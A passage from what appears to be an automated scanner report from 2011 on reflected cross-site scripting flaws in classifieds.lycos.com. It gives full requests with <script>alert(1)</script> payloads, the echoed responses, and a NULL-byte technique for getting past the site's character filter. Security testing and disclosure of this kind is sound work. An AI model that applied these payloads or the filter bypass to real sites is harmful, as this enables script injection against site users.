<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedane3b74"><script>alert(1)</script>2118badbcb7/?mobile=1" rel="nofollow"> ...[SNIP]...
1.222. http://classifieds.lycos.com/vehicle-car-sedan/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-car-sedan/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df4c"><script>alert(1)</script>2dade4d62cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedan/?6df4c"><script>alert(1)</script>2dade4d62cc=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:00:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 107258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan/?6df4c"><script>alert(1)</script>2dade4d62cc=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af05e"><script>alert(1)</script>60e208c437b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedanaf05e"><script>alert(1)</script>60e208c437b/2011-honda-accord-23730-00-2416142889 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17817
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedanaf05e"><script>alert(1)</script>60e208c437b/2011-honda-accord-23730-00-2416142889?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0032914"><script>alert(1)</script>16bd371041b was submitted in the REST URL parameter 2. This input was echoed as 32914"><script>alert(1)</script>16bd371041b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889%0032914"><script>alert(1)</script>16bd371041b HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:40 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889%0032914"><script>alert(1)</script>16bd371041b?mobile=1" rel="nofollow"> ...[SNIP]...
1.225. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c80"><script>alert(1)</script>6d947060cf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889?b9c80"><script>alert(1)</script>6d947060cf8=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:19 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/ Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889?b9c80"><script>alert(1)</script>6d947060cf8=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f126a"><script>alert(1)</script>9913767c13f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedanf126a"><script>alert(1)</script>9913767c13f/2011-honda-accord-24480-00-2416142887 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17817
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedanf126a"><script>alert(1)</script>9913767c13f/2011-honda-accord-24480-00-2416142887?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f7f14"><script>alert(1)</script>cef468bc4e7 was submitted in the REST URL parameter 2. This input was echoed as f7f14"><script>alert(1)</script>cef468bc4e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887%00f7f14"><script>alert(1)</script>cef468bc4e7 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887%00f7f14"><script>alert(1)</script>cef468bc4e7?mobile=1" rel="nofollow"> ...[SNIP]...
1.228. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94981"><script>alert(1)</script>7d681b86df3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887?94981"><script>alert(1)</script>7d681b86df3=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:24 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/ Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887?94981"><script>alert(1)</script>7d681b86df3=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114aa"><script>alert(1)</script>9b2b6d60c7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedan114aa"><script>alert(1)</script>9b2b6d60c7d/2011-honda-civic-19905-00-2416144203 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan114aa"><script>alert(1)</script>9b2b6d60c7d/2011-honda-civic-19905-00-2416144203?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003d11a"><script>alert(1)</script>7130122b1d6 was submitted in the REST URL parameter 2. This input was echoed as 3d11a"><script>alert(1)</script>7130122b1d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203%003d11a"><script>alert(1)</script>7130122b1d6 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:47 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203%003d11a"><script>alert(1)</script>7130122b1d6?mobile=1" rel="nofollow"> ...[SNIP]...
1.231. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e66"><script>alert(1)</script>328e80c3280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203?38e66"><script>alert(1)</script>328e80c3280=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:13 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/ Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24721
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203?38e66"><script>alert(1)</script>328e80c3280=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23f0c"><script>alert(1)</script>689aeb97041 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-suv23f0c"><script>alert(1)</script>689aeb97041/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-suv23f0c"><script>alert(1)</script>689aeb97041/?mobile=1" rel="nofollow"> ...[SNIP]...
1.233. http://classifieds.lycos.com/vehicle-car-suv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-car-suv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abea"><script>alert(1)</script>c96611a4213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-suv/?2abea"><script>alert(1)</script>c96611a4213=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 105613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-suv/?2abea"><script>alert(1)</script>c96611a4213=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8355"><script>alert(1)</script>4bd8ec7dbaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-truckd8355"><script>alert(1)</script>4bd8ec7dbaa/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-truckd8355"><script>alert(1)</script>4bd8ec7dbaa/?mobile=1" rel="nofollow"> ...[SNIP]...
1.235. http://classifieds.lycos.com/vehicle-car-truck/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-car-truck/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51867"><script>alert(1)</script>116d2a68c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-truck/?51867"><script>alert(1)</script>116d2a68c1f=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:36 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 101338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-truck/?51867"><script>alert(1)</script>116d2a68c1f=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>9e0ee8e16ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car87310"><script>alert(1)</script>9e0ee8e16ae/2008-ford-40k-miles-2416144596 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:49 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car87310"><script>alert(1)</script>9e0ee8e16ae/2008-ford-40k-miles-2416144596?mobile=1" rel="nofollow"> ...[SNIP]...
